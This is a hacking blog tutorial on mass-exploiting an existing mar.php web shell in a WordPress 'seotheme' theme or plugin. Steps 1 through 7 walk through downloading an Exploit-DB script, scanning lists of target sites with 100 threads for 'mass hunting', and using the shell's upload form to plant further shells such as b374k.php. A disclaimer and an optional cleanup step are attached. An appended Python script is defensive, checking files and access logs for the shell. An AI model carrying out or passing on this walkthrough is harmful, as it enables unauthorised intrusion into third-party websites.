Wordpress Seotheme - Remote Code Execution Unauthenticated

⚠️ This article is intended solely for educational purposes. The creator shall not be held liable for any misuse, illegal activity, or damage resulting from unauthorized use of this material.

🔎 Step 1: Identify the Vulnerable Target

This exploit targets:

  • /wp-content/themes/seotheme/mar.php
  • /wp-content/plugins/seoplugins/mar.php

The shell is already bundled in that script, so as soon as one of those endpoints is live you can upload files through its PHP form. In other words, mar.php is itself a small web shell (see Step 6), and the exploit only checks whether it answers at one of those two paths.

⚙️ Step 2: Prepare the Tools

  • Python2 (not Python3!)
  • The file mar.py (the exploit itself)
  • A file vuln.txt containing the list of target URLs

Install Python2 (Linux):

sudo apt install python2

📥 Step 3: Grab the Exploit Script

Download the exploit:

wget https://www.exploit-db.com/download/51789 -O mar.py

Or copy-paste it manually from Exploit-DB: https://www.exploit-db.com/exploits/51789 into a file named mar.py

📝 Step 4: Build the Target List

Fill vuln.txt with one URL per line, for example:

http://target1.com
https://target2.com
http://site.target3.com

🚀 Step 5: Run the Exploit

Run the script:

python2 mar.py vuln.txt

The results show up in the terminal. On success you will see:

-| http://target.com --> [Successfully]

The shell URLs are saved automatically to:

  • seotheme-Shells.txt
  • seoplugins-Shells.txt

🧪 Step 6: Test the Shell

Open one of the URLs that succeeded, for example:

http://target.com/wp-content/themes/seotheme/mar.php

A mini shell like this will appear:

  • System info
  • File upload form (.php, .txt, etc.)

📤 Step 7: Upload a Shell or Another Script

Use the form provided to upload any file from your machine to the target server.

Example uploads: b374k.php, mini-shell.php, or sclu.html

🧹 Step 8: Clean Up or Secure (Optional)

If you are only testing or auditing, don't forget to delete the shell or restrict access to it. Deleting mar.php removes the upload form, but anything already uploaded through it (Step 7) is a separate file and has to be found and removed as well. Ethical hacking means taking responsibility, bro 🤝

📌 Additional Notes

  • The script is multi-threaded with Pool(100), so it is fast against many targets
  • It uses a signature from an external image to check whether the shell actually works
  • Plenty of sites still run the old SEOtheme, so it is decent for mass hunting 👀
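The flip side of Steps 1, 5 and 8, as an added example that is not the exploit from Exploit-DB and not part of the original post: a defender-side check for the same two mar.php locations. Given the paths listed in Step 1 and the upload-form behaviour described in Step 7, it builds the probe URLs a scanner would request for each line of vuln.txt, walks a WordPress install for the shell file, and flags access-log requests to it. The combined log format, the sample log lines and the throwaway directory tree are constructed for the example; the bare-hostname-means-HTTP rule in probe_urls is an assumption.

```python
"""Defender-side checks for the seotheme/seoplugins mar.php web shell (added example)."""
import os
import re
import shutil
import tempfile
from urllib.parse import urljoin

# The two locations the post names in Step 1.
BACKDOOR_PATHS = (
    "wp-content/themes/seotheme/mar.php",
    "wp-content/plugins/seoplugins/mar.php",
)


def probe_urls(base_url):
    """Return the two URLs a scanner would request for one target line."""
    base = base_url.strip()
    if not base.startswith(("http://", "https://")):
        base = "http://" + base  # assumption: a bare hostname in vuln.txt means plain HTTP
    if not base.endswith("/"):
        base += "/"
    return [urljoin(base, p) for p in BACKDOOR_PATHS]


def load_targets(text):
    """Parse vuln.txt content: one URL per line; blank lines and '#' comments are ignored."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def find_backdoor_files(wp_root):
    """Walk a WordPress install and return the shell files present, relative to wp_root."""
    hits = []
    for dirpath, _dirs, files in os.walk(wp_root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), wp_root).replace(os.sep, "/")
            if rel in BACKDOOR_PATHS:
                hits.append(rel)
    return sorted(hits)


# Apache/nginx "combined" log line: client - - [time] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def scan_access_log(lines):
    """Return (ip, method, path, status, verdict) for every request to a mar.php path.

    A GET answered with 200 means the shell is reachable (the success case in Step 5);
    a POST to it is the upload form from Step 7 being used.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0].lstrip("/")
        if path not in BACKDOOR_PATHS:
            continue
        status = int(m.group("status"))
        method = m.group("method")
        if method == "POST":
            verdict = "upload attempt via shell form"
        elif status == 200:
            verdict = "shell reachable"
        else:
            verdict = "probe, no shell (HTTP %d)" % status
        findings.append((m.group("ip"), method, path, status, verdict))
    return findings


def demo_filesystem_scan():
    """Build a throwaway WordPress tree with the theme shell present and scan it."""
    root = tempfile.mkdtemp()
    shell = os.path.join(root, "wp-content", "themes", "seotheme", "mar.php")
    os.makedirs(os.path.dirname(shell))
    with open(shell, "w") as fh:
        fh.write("<?php /* placeholder standing in for the shell */ ?>")
    os.makedirs(os.path.join(root, "wp-content", "plugins", "seoplugins"))  # directory, no shell
    try:
        return find_backdoor_files(root)
    finally:
        shutil.rmtree(root)


# Constructed sample log lines; not taken from any real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2024:10:01:02 +0000] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 200 1834 "-" "-"',
    '203.0.113.7 - - [12/May/2024:10:01:03 +0000] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.7 - - [12/May/2024:10:02:15 +0000] "POST /wp-content/themes/seotheme/mar.php HTTP/1.1" 200 1920 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/May/2024:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for url in probe_urls("http://target1.com"):
        print("probe:", url)
    print("on disk:", demo_filesystem_scan())
    for finding in scan_access_log(SAMPLE_LOG):
        print("log:", finding)
```

Run it as-is to see the three cases on the constructed log (a reachable shell, a 404 probe, and a POST upload); point find_backdoor_files at a real document root and scan_access_log at a real access log to check your own sites. Requests to either path from hosts you do not recognise are worth investigating even when they return 404, because that is exactly what the mass scan in Step 5 looks like from the server side.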

"Where creativity, exploitation, and expression collide." — 6ickZone
